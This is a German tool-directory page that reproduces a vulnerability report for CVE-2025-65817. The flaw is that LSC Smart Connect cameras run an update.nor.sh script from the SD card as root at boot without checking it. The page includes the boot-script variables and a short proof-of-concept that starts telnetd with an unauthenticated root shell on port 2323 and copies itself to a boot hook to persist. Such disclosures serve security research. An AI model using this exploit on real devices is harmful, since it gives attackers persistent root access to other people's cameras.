Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-65817 — Hier ist die CVE-2025-65817 | Kitploit
Tools/GitHubGitHub/istaarkk/cve-2025-65817
Embedded-System-SicherheitIoT-SicherheitSchwachstellenanalyseExploitationHardware- & IoT-SicherheitRemote-Access-Tool
GitHubistaarkk/cve-2025-65817

CVE-2025-65817

Hier ist die CVE-2025-65817

Repository anzeigen
92vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-65817


FelderWert
TitelSchwachstellenbericht: LSC Smart Connect Kamera
Datum2024-02-15
BeschreibungMissbrauch des SD-Karten-Update-Hooks, um Remote-Shells auf LSC Smart Connect Kameras zu starten.
Tagsiot, vulnerability, cve
Firmware1.14.13

Schwachstellenbericht zur LSC Smart Connect Kamera

Die gefundene Schwachstelle besteht darin, das Updatesystem in start_app.sh auszunutzen, genauer gesagt über den SD-Karten-Mount und die Datei update.nor.sh.

Konfigurationsvariablen

root@kitploit:~
# routines of sd-card
# /mnt is for backword compatible
SDC_DIR=/mnt
SDC_HOOK=$SDC_DIR/update.nor.sh
SDC_FLAG_DEBUG=$SDC_DIR/__ipc_debug.ini
TMP_HOOK=/tmp/update.nor.sh
SENSOR_ISP_HOOK=$SDC_DIR/ISP/*t23.bin
# debug core-dump
WHERE_COREDMP="/mnt/sdc/coredmp"
WHERE_EXEC="/usr/local/bin/doraemon"

Der Abschnitt local/sbin/start_app.sh:50–99 vertraut blind jeder Datei mit dem Namen update.nor.sh, die sich auf der SD-Karte befindet. Während des Bootvorgangs führt das Skript Folgendes aus:

  • mountet die SD-Karte,
  • kopiert update.nor.sh nach /tmp/update.nor.sh,
  • führt keine Validierung des Inhalts, der Integrität, der Berechtigungen oder des Besitzers durch.

Später im Startvorgang (local/sbin/start_app.sh:108–129) wird die kopierte Datei:

  • als ausführbar markiert,
  • als root ausgeführt,
  • mit dem Mount-Punkt der SD-Karte als Argument ausgeführt.

Diese Ausführung erfolgt bevor der Haupt-ipc_service startet, was bedeutet, dass das Skript in einer Umgebung mit höchsten Privilegien läuft, in der Netzwerk-Dienstprogramme, Watchdog-Funktionen und Upgrade-Helfer bereits verfügbar sind.

Verfügbare Dienstprogramme

Der Exploit besteht darin, eine Shell zu erzeugen und einen Port über telnetd zu öffnen, das auf der Kamera vorhanden ist:

root@kitploit:~
/bin # busybox --list
[...]
sh
sleep
swapoff
syslogd
tail
tar
tcpsvd
telnetd
[...]

Proof of Concept

Wir müssen lediglich ein .sh-Skript auf die SD-Karte schreiben und es update.nor.sh nennen.

Der Exploit, den ich gewählt habe, ist:

root@kitploit:~
#!/bin/sh

telnetd -l /bin/sh -p 2323 &

echo "Telnet start by update.nor.sh" > /tmp/exploit_success

cp /mnt/update.nor.sh /mnt/config/hook-boot.sh

date > /tmp/exploit_time

Wir bestätigen, dass der Port offen ist.

alt text

Wir verbinden uns per Telnet:

alt text

Tool herunterladen